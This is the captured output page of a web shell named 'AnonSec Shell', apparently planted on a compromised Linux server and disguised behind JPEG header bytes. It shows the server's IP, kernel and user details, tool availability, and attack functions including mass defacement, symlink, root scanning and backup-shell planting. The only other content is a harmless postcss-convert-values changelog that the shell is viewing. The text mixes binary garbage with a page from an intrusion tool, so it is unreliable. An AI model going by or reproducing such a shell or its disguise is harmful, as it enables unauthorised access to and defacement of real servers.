JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 104.21.79.64  /  Your IP : 104.23.197.30   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/app/eseso/cms/node_modules/postcss-convert-values/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/app/eseso/cms/node_modules/postcss-convert-values/CHANGELOG.md
# 4.0.0-rc.0

* Breaking: Drops support for Node 0.12, we now require at least Node 4.
* Breaking: Update PostCSS to 6.0.0.
* Breaking: Removes the deprecated options from version 2.2.0.

# 2.6.1

* Resolves an issue where IE hacks were being removed from `0` values
  (thanks to @Justineo).

# 2.6.0

* Added clamping of the values for the `shape-image-threshold` property, using
  the same logic as introduced in version `2.5.0`.

# 2.5.0

* Added clamping of the values for the `opacity` property to the `0-1` range.
  For example, this will convert `opacity: 1.1` to `opacity: 1`.

# 2.4.1

* Resolves an issue where the units would be stripped from zero values in
  custom properties (thanks to @jgerigmeyer).

# 2.4.0

* Added a `precision` option to enable rounding of decimal places for
  `px` values.

# 2.3.6

* Resolves an issue with the last patch where `height: 0em` was not being
  converted to `height: 0`.

# 2.3.5

* Resolves an issue where certain properties inside `@keyframes` rules would
  break animation in IE due to the percentage being stripped. Now, the
  percentage is preserved for these properties.

# 2.3.4

* Does not convert `height:0%` to `height:0` (and the same for `max-height`), as
  they produce different results.

# 2.3.3

* Updates postcss-value-parser to version 3 (thanks to @TrySound).

# 2.3.2

* Fixed a regression where `0%` in color functions was being transformed to `0`
  (thanks to @TrySound).

# 2.3.1

* Fixed a behaviour where `0deg` was being converted to `0`.

# 2.3.0

* Added an option to convert between `turn` & `deg` (thanks to @TrySound).

# 2.2.1

* Fixes a behaviour where the module would remove units from zero values inside
  calc functions (thanks to @marek-saji & @TrySound).

# 2.2.0

* Renames `opts.convertLength` & `opts.convertTime` to
  `opts.length` & `opts.time`; the old options will now print deprecation
  warnings (thanks to @TrySound).

# 2.1.0

* Adds options to enable/disable unit conversion for time & length values.

# 2.0.1

* Bump postcss-value-parser to `2.0.2`.

# 2.0.0

* Upgraded to PostCSS 5.

# 1.3.1

* Fixes an issue where the module would convert values in gradient/url functions
  since 1.3.0.

# 1.3.0

* Converted the module to use ES6.
* balanced-match, css-list & some integrated code has been replaced with
  postcss-value-parser; reducing the number of moving parts in this module, and
  providing a more futureproof way of parsing CSS numeric values.

# 1.2.5

* Fixes an issue where uppercase units (such as PX) were being deleted.

# 1.2.4

* Fixes convert not px or ms

# 1.2.3

* Adds support for `ch` units; previously they were removed.
* Upgrades css-list to `0.1.0`, code tidied up.

# 1.2.2

* Added support for viewport units (thanks to @TrySound).

# 1.2.1

* Fixes regressions introduced by the previous patch. Better support for
  negative value transforms.

# 1.2.0

* Adds support for slash/comma separated values (thanks to @TrySound).

# 1.1.1

* Fixes an issue where trailing zeroes were not being removed in
  values that were not `0` (thanks to @TrySound).

# 1.1.0

* Adds support for removing leading zeroes from `rem` values
  (thanks to @tunnckoCore).

# 1.0.3

* Fixed a bug where filenames were being incorrectly transformed.

# 1.0.2

* Fixed a bug where `1.` and `.0` were not being optimised to `1` and `0`,
  respectively.

# 1.0.1

* Fixed a bug where `undefined` would be stringified as the unit value, if the
  value did not have a unit.

# 1.0.0

* Initial release.

Anon7 - 2022
AnonSec Team